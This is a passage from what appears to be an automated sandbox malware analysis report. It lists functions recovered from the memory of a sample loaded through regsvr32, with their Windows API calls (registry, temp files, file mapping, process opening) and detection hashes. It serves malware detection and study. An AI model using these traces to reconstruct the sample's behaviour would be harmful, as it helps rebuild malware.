                • GetLastError.KERNEL32(?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE251E
                  • Part of subcall function 04BE41CF: lstrlen.KERNEL32(?,00000000,04BE249E,00000027,04BEE268,?,00000000,?,?,04BE249E,?,00000001,?,04BDA7DD,00000000,?), ref: 04BE4205
                  • Part of subcall function 04BE41CF: lstrcpy.KERNEL32(00000000,00000000), ref: 04BE4229
                  • Part of subcall function 04BE41CF: lstrcat.KERNEL32(00000000,00000000), ref: 04BE4231
                • GetFileSize.KERNEL32(04BDA7DD,00000000,?,00000001,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE24A9
                • CreateFileMappingA.KERNEL32(04BDA7DD,04BEE268,00000002,00000000,00000000,04BDA7DD), ref: 04BE24BD
                • lstrlen.KERNEL32(04BDA7DD,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE24D9
                • lstrcpy.KERNEL32(?,04BDA7DD), ref: 04BE24E9
                • GetLastError.KERNEL32(?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE24F1
                • HeapFree.KERNEL32(00000000,04BDA7DD,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE2504
                • CloseHandle.KERNEL32(04BDA7DD,?,00000001,?,04BDA7DD), ref: 04BE2516
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                • String ID:
                • API String ID: 194907169-0
                • Opcode ID: 72822161e792c47e66a319beb0c5cedb4dee88d68172076607810fca59619583
                • Instruction ID: 292ecf066d7acb03a25c0f72270a7313ba91036aab72a012f4393915b13e4d80
                • Opcode Fuzzy Hash: 72822161e792c47e66a319beb0c5cedb4dee88d68172076607810fca59619583
                • Instruction Fuzzy Hash: D7213971900608FFDB10AFA6D848AAEBFB9EB84351F1080AAF505EB151D7359E409F70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD1D5B Relevance: 15.1, APIs: 10, Instructions: 59sleepsynchronizationCOMMON
                Download Yara Rule
                APIs
                • SetEvent.KERNEL32(?,?,04BCCE97), ref: 04BD1D70
                  • Part of subcall function 04BD810B: InterlockedExchange.KERNEL32(?,000000FF), ref: 04BD8112
                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,04BCCE97), ref: 04BD1D90
                • CloseHandle.KERNEL32(00000000,?,04BCCE97), ref: 04BD1D99
                • CloseHandle.KERNEL32(?,?,?,04BCCE97), ref: 04BD1DA3
                • RtlEnterCriticalSection.NTDLL(?), ref: 04BD1DAB
                • RtlLeaveCriticalSection.NTDLL(?), ref: 04BD1DC3
                • Sleep.KERNEL32(000001F4), ref: 04BD1DD2
                • CloseHandle.KERNEL32(?), ref: 04BD1DDF
                • LocalFree.KERNEL32(?), ref: 04BD1DEA
                • RtlDeleteCriticalSection.NTDLL(?), ref: 04BD1DF4
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                • String ID:
                • API String ID: 1408595562-0
                • Opcode ID: 73f0e616c261db8bad732b7943bec1dd9442c3c601425590e3a846c0ea8e27f8
                • Instruction ID: 38f61303da094371727fe9f15014c141a90b90eb3223317279db6956ad5f68f7
                • Opcode Fuzzy Hash: 73f0e616c261db8bad732b7943bec1dd9442c3c601425590e3a846c0ea8e27f8
                • Instruction Fuzzy Hash: ED114C31240A159FDB216F7ADC48A5AB7B9EF84741304499AE68397510EB3AF8409B70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD373F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(00000001,00000000,?,?,04BCBD83,?,00000001,?,?,?), ref: 04BD3756
                • lstrlen.KERNEL32(?), ref: 04BD3766
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BD379A
                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 04BD37C5
                • memcpy.NTDLL(00000000,?,?), ref: 04BD37E4
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BD3845
                • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 04BD3867
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Allocatelstrlenmemcpy$Free
                • String ID: W
                • API String ID: 3204852930-655174618
                • Opcode ID: bf12ddf8a503e0d40b28614e9b3fea990d40f3a207eaf5f9f7ba6b41104ac122
                • Instruction ID: 9c3ad47c2c0c9557044a21099ee1bc929e5172ef3dc03a10f3ab7c437e1a2f82
                • Opcode Fuzzy Hash: bf12ddf8a503e0d40b28614e9b3fea990d40f3a207eaf5f9f7ba6b41104ac122
                • Instruction Fuzzy Hash: 474117B1D00209EFDF11DFA5CC84AAE7BB9EF44344F1484AAED04A7211E736AA54DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCC5D9 Relevance: 13.7, APIs: 9, Instructions: 168memorythreadsleepCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL ref: 04BCC61A
                • memset.NTDLL ref: 04BCC62E
                  • Part of subcall function 04BCBC31: RegQueryValueExA.KERNELBASE(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,00000003,00000000,?,00000000,?,04BDE5BD,04BDE5BD,?,04BD6019,00000000), ref: 04BCBC69
                  • Part of subcall function 04BCBC31: RtlAllocateHeap.NTDLL(00000000,04BD6019), ref: 04BCBC7D
                  • Part of subcall function 04BCBC31: RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                  • Part of subcall function 04BCBC31: RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                • GetCurrentThreadId.KERNEL32 ref: 04BCC6BB
                • GetCurrentThread.KERNEL32 ref: 04BCC6CE
                • RtlEnterCriticalSection.NTDLL(0624C0A0), ref: 04BCC775
                • Sleep.KERNEL32(0000000A), ref: 04BCC77F
                • RtlLeaveCriticalSection.NTDLL(0624C0A0), ref: 04BCC7A5
                • HeapFree.KERNEL32(00000000,?), ref: 04BCC7D3
                • HeapFree.KERNEL32(00000000,00000018), ref: 04BCC7E6
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                • String ID:
                • API String ID: 1146182784-0
                • Opcode ID: 79454d804facecc36b3b5217a91ef469270627e8c632b772339949b510d72ae8
                • Instruction ID: 26547f429965bd662afea8e5094fa45332a4a8f59aeb7340dcf7c5d39a8c18ed
                • Opcode Fuzzy Hash: 79454d804facecc36b3b5217a91ef469270627e8c632b772339949b510d72ae8
                • Instruction Fuzzy Hash: 7251F4B5504601AFE750DF29D8C481ABBF8FB99344F00496FF589DB211E735ED488BA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE2D18 Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BD20E3: RtlEnterCriticalSection.NTDLL(04BEE4A8), ref: 04BD20EB
                  • Part of subcall function 04BD20E3: RtlLeaveCriticalSection.NTDLL(04BEE4A8), ref: 04BD2100
                  • Part of subcall function 04BD20E3: InterlockedIncrement.KERNEL32(0000001C), ref: 04BD2119
                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BE2D69
                • lstrlen.KERNEL32(00000008,?,?,?,04BC110F,00000000,00000000,-00000008,?,?), ref: 04BE2D78
                • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 04BE2D8A
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,04BC110F,00000000,00000000,-00000008,?,?), ref: 04BE2D9A
                • memcpy.NTDLL(00000000,?,?,?,?,?,04BC110F,00000000,00000000,-00000008,?,?), ref: 04BE2DAC
                • lstrcpy.KERNEL32(00000020), ref: 04BE2DDE
                • RtlEnterCriticalSection.NTDLL(04BEE4A8), ref: 04BE2DEA
                • RtlLeaveCriticalSection.NTDLL(04BEE4A8), ref: 04BE2E42
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                • String ID:
                • API String ID: 3746371830-0
                • Opcode ID: 085a9ffd749f8b27cac5cbd1c6775b196c67883a7712f04d754726c9841fbf5e
                • Instruction ID: 2c55399ac3cf5b6dfc9afc497e2ec6f34003eb19003349baa1d51c1cabd9b0a0
                • Opcode Fuzzy Hash: 085a9ffd749f8b27cac5cbd1c6775b196c67883a7712f04d754726c9841fbf5e
                • Instruction Fuzzy Hash: 2E41CF71500715EFEB219F2AD844B6ABBF8FF88715F00849AE8099B241E775ED50DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BE36FE Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,04BE4FFC), ref: 04BE373F
                • GetLastError.KERNEL32 ref: 04BE3749
                • WaitForSingleObject.KERNEL32(000000C8), ref: 04BE376E
                • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 04BE378F
                • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 04BE37B7
                • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 04BE37CC
                • SetEndOfFile.KERNEL32(00000006), ref: 04BE37D9
                • GetLastError.KERNEL32 ref: 04BE37E5
                • CloseHandle.KERNEL32(00000006), ref: 04BE37F1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                • String ID:
                • API String ID: 2864405449-0
                • Opcode ID: bdd62fec39d94c1e87499bcffa3f5439139f0ca81c122593691be4c2a704da60
                • Instruction ID: feb5e8598c08f5e27330264d88c9849eb8a56cffd062501a708b07cdd4e02a91
                • Opcode Fuzzy Hash: bdd62fec39d94c1e87499bcffa3f5439139f0ca81c122593691be4c2a704da60
                • Instruction Fuzzy Hash: F1316BB1900208BBEB119FA6DD49FAE7BB9EB84315F204195F911EB090D3789E50DB21
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDECAB Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                Download Yara Rule
                APIs
                • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04BDE92B,00000000,74E5F5B0,04BD47CC,?,00000001), ref: 04BDECB7
                • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 04BDECCD
                • _snwprintf.NTDLL ref: 04BDECF2
                • CreateFileMappingW.KERNEL32(000000FF,04BEE268,00000004,00000000,00001000,?), ref: 04BDED0E
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04BDED20
                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04BDED37
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 04BDED58
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04BDED60
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID:
                • API String ID: 1814172918-0
                • Opcode ID: ed3ce243f5ecb3d712f5b893763f3421c2fc4cc446d5d900b723e050d2ee5194
                • Instruction ID: 0d1461507b5d37952916beb2ab5fc79755de77c1bbd4bb97d020ff7850df6e8f
                • Opcode Fuzzy Hash: ed3ce243f5ecb3d712f5b893763f3421c2fc4cc446d5d900b723e050d2ee5194
                • Instruction Fuzzy Hash: 4B21F376640608BBD721AB69DC04F9D77A9EB84710F2100A2F606EF190EB70E9009B70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCED0A Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145timestringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BC7A3C: InterlockedIncrement.KERNEL32(?), ref: 04BC7A8D
                  • Part of subcall function 04BC7A3C: RtlLeaveCriticalSection.NTDLL(0624C148), ref: 04BC7B18
                • OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C), ref: 04BCED64
                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C), ref: 04BCED82
                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BCEDE8
                • lstrlenW.KERNEL32(?), ref: 04BCEE5D
                • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 04BCEE79
                • memcpy.NTDLL(00000014,?,00000002), ref: 04BCEE91
                  • Part of subcall function 04BC56F4: RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BC5771
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                • String ID: o
                • API String ID: 2541713525-252678980
                • Opcode ID: aa0ff6fd40ac9688f18c0f70b16460bbbd612a0b7f7832a605530298481daf94
                • Instruction ID: 75567787feda8396f8a953e213a6071bb717a633bd1ecadec3617c3962d8ffee
                • Opcode Fuzzy Hash: aa0ff6fd40ac9688f18c0f70b16460bbbd612a0b7f7832a605530298481daf94
                • Instruction Fuzzy Hash: 1E517D71640706EFEB20DF65C8C8BA6B7A8FF04744F0449ADE9459B150E7B4F984CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD8EB0 Relevance: 12.1, APIs: 8, Instructions: 72memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,04BD219F,?,?,?,?), ref: 04BD8ED4
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BD8EE6
                • wcstombs.NTDLL ref: 04BD8EF4
                • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,04BD219F,?,?,?), ref: 04BD8F18
                • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04BD8F2D
                • mbstowcs.NTDLL ref: 04BD8F3A
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,04BD219F,?,?,?,?,?), ref: 04BD8F4C
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,04BD219F,?,?,?,?,?), ref: 04BD8F66
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                • String ID:
                • API String ID: 316328430-0
                • Opcode ID: bb3c07d2ecaa92210128e64ae2655a1ab380ebe72aa080dc7b6abb7e74b4201b
                • Instruction ID: b01f0d9b16fcbdae3626df45babfe04ab9327a85f959a32f5a6486611aab6095
                • Opcode Fuzzy Hash: bb3c07d2ecaa92210128e64ae2655a1ab380ebe72aa080dc7b6abb7e74b4201b
                • Instruction Fuzzy Hash: CE216A3150020AFFDF10AFA2DC09F9A7FB9EB84301F1045A6BA14A7061D7359E54DB70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDAE91 Relevance: 10.6, APIs: 7, Instructions: 143memoryfilestringCOMMON
                Download Yara Rule
                APIs
                • InterlockedIncrement.KERNEL32(04BEE0EC), ref: 04BDAF4B
                • lstrcpy.KERNEL32(00000000), ref: 04BDAF87
                  • Part of subcall function 04BC1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,04BDDB18,?,?,00000000,04BCC692,?,?,?,?,00000000,?), ref: 04BC1B99
                  • Part of subcall function 04BC1B8A: mbstowcs.NTDLL ref: 04BC1BB5
                • GetLastError.KERNEL32(00000000), ref: 04BDB016
                • HeapFree.KERNEL32(00000000,?), ref: 04BDB02D
                • InterlockedDecrement.KERNEL32(04BEE0EC), ref: 04BDB044
                • DeleteFileA.KERNEL32(00000000), ref: 04BDB065
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BDB075
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D66
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D7F
                  • Part of subcall function 04BD0D54: GetCurrentThreadId.KERNEL32 ref: 04BD0D8C
                  • Part of subcall function 04BD0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D98
                  • Part of subcall function 04BD0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0DA6
                  • Part of subcall function 04BD0D54: lstrcpy.KERNEL32(00000000), ref: 04BD0DC8
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                • String ID:
                • API String ID: 908044853-0
                • Opcode ID: 575d6c4b3707abf96bec34c02aa76fb28954830100899eecd85062413eac4504
                • Instruction ID: 8ed510b50daf50e2e63b4a858d1377241b578fb27384c82867240c5754dd9676
                • Opcode Fuzzy Hash: 575d6c4b3707abf96bec34c02aa76fb28954830100899eecd85062413eac4504
                • Instruction Fuzzy Hash: A741D8B2C00608BBDB117A7598847AD7BB5DB98355F0240E1EF119B212F739AD039762
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCAC05 Relevance: 10.6, APIs: 7, Instructions: 123registrymemoryCOMMON
                Download Yara Rule
                APIs
                • RtlImageNtHeader.NTDLL ref: 04BCAC2E
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 04BCAC71
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BCAC8C
                • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 04BCACE2
                • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 04BCAD3D
                • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 04BCAD4B
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BCAD56
                  • Part of subcall function 04BC2237: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 04BC224B
                  • Part of subcall function 04BC2237: memcpy.NTDLL(00000000,04BD153B,?,?,-00000005,?,04BD153B,00000001,00000000,-00000005,00000001), ref: 04BC2274
                  • Part of subcall function 04BC2237: RegCloseKey.ADVAPI32(?,?,04BD153B,00000001,00000000,-00000005,00000001), ref: 04BC22C8
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
                • String ID:
                • API String ID: 2070110485-0
                • Opcode ID: ec9493cd53fbc7e472e14438cd756d7fa86cf579519d7c3e35410efdaef6a558
                • Instruction ID: 6bd0fc2e2c98280a221ce64258d65d73895b2d3a53d88b4532f6beef03d77814
                • Opcode Fuzzy Hash: ec9493cd53fbc7e472e14438cd756d7fa86cf579519d7c3e35410efdaef6a558
                • Instruction Fuzzy Hash: 11416E72200209ABEF219F66DC88F6B37ADEF88746F0400A9F905DB151DB74ED51EA70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDAF39 Relevance: 10.6, APIs: 7, Instructions: 111memoryfilestringCOMMON
                Download Yara Rule
                APIs
                • InterlockedIncrement.KERNEL32(04BEE0EC), ref: 04BDAF4B
                • lstrcpy.KERNEL32(00000000), ref: 04BDAF87
                  • Part of subcall function 04BC1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,04BDDB18,?,?,00000000,04BCC692,?,?,?,?,00000000,?), ref: 04BC1B99
                  • Part of subcall function 04BC1B8A: mbstowcs.NTDLL ref: 04BC1BB5
                • GetLastError.KERNEL32(00000000), ref: 04BDB016
                • HeapFree.KERNEL32(00000000,?), ref: 04BDB02D
                • InterlockedDecrement.KERNEL32(04BEE0EC), ref: 04BDB044
                • DeleteFileA.KERNEL32(00000000), ref: 04BDB065
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BDB075
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D66
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D7F
                  • Part of subcall function 04BD0D54: GetCurrentThreadId.KERNEL32 ref: 04BD0D8C
                  • Part of subcall function 04BD0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D98
                  • Part of subcall function 04BD0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0DA6
                  • Part of subcall function 04BD0D54: lstrcpy.KERNEL32(00000000), ref: 04BD0DC8
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                • String ID:
                • API String ID: 908044853-0
                • Opcode ID: 620e5531ac5d5626b712bbf03b32ef1a16eebe2dfb44630246b644034ea60a39
                • Instruction ID: 0a35f5c6fb41b88714c1f3eda38f5db535ecade53cf885fdd7584c5eed2d8e4f
                • Opcode Fuzzy Hash: 620e5531ac5d5626b712bbf03b32ef1a16eebe2dfb44630246b644034ea60a39
                • Instruction Fuzzy Hash: 58310532900514EBDB21AFB2C888AAD7BB4EB88744F1140E6F914EB151E774FE41DBB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCDE6F Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D66
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D7F
                  • Part of subcall function 04BD0D54: GetCurrentThreadId.KERNEL32 ref: 04BD0D8C
                  • Part of subcall function 04BD0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D98
                  • Part of subcall function 04BD0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0DA6
                  • Part of subcall function 04BD0D54: lstrcpy.KERNEL32(00000000), ref: 04BD0DC8
                • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 04BCDEB5
                • StrTrimA.SHLWAPI(?,?), ref: 04BCDED3
                • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 04BCDF3C
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 04BCDF5D
                • DeleteFileA.KERNEL32(?,00003219), ref: 04BCDF7F
                • HeapFree.KERNEL32(00000000,?), ref: 04BCDF8E
                • HeapFree.KERNEL32(00000000,?,00003219), ref: 04BCDFA6
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                • String ID:
                • API String ID: 1078934163-0
                • Opcode ID: e0a352ba2c0b7a7f276aaeaac6e35f1a19d1bc6b5b3136707581659a51ef30d1
                • Instruction ID: 76400475fe61188a2433f089a232c4b36c0657af2f543a32ad88072fb668ef72
                • Opcode Fuzzy Hash: e0a352ba2c0b7a7f276aaeaac6e35f1a19d1bc6b5b3136707581659a51ef30d1
                • Instruction Fuzzy Hash: E7318F3220420AAFE711EF65DC84F6A77ADFB84704F0504AAF944EB191D765ED058BB2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCC4B3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,04BDF266,00000000), ref: 04BCC4CD
                • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 04BCC4E2
                • memset.NTDLL ref: 04BCC4EF
                • HeapFree.KERNEL32(00000000,00000000,?,04BDF265,?,?,00000000,?,00000000,04BCFB8A,?,00000000), ref: 04BCC50C
                • memcpy.NTDLL(?,?,04BDF265,?,04BDF265,?,?,00000000,?,00000000,04BCFB8A,?,00000000), ref: 04BCC52D
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Allocate$Freememcpymemset
                • String ID: chun
                • API String ID: 2362494589-3058818181
                • Opcode ID: 69045a43ae17380449037a3c888f2ef47cba0303ef39076b3b88721887dc5a3e
                • Instruction ID: bfedf5915a4e5a7b7d71f8ac005659845f8bb15be8029b3e1015dbf43542bd93
                • Opcode Fuzzy Hash: 69045a43ae17380449037a3c888f2ef47cba0303ef39076b3b88721887dc5a3e
                • Instruction Fuzzy Hash: D3316071600706AFD720DF66D885A16BBF8EF98314F01446AE949CB621D770F905DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDB655 Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(04BE42B9,00000000,04BEE4A0,04BEE4C0,?,?,04BE42B9,04BD26E1,04BEE4A0), ref: 04BDB665
                • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04BDB67B
                • lstrlen.KERNEL32(04BD26E1,?,?,04BE42B9,04BD26E1,04BEE4A0), ref: 04BDB683
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BDB68F
                • lstrcpy.KERNEL32(04BEE4A0,04BE42B9), ref: 04BDB6A5
                • HeapFree.KERNEL32(00000000,00000000,?,?,04BE42B9,04BD26E1,04BEE4A0), ref: 04BDB6F9
                • HeapFree.KERNEL32(00000000,04BEE4A0,?,?,04BE42B9,04BD26E1,04BEE4A0), ref: 04BDB708
                Memory Dump Source
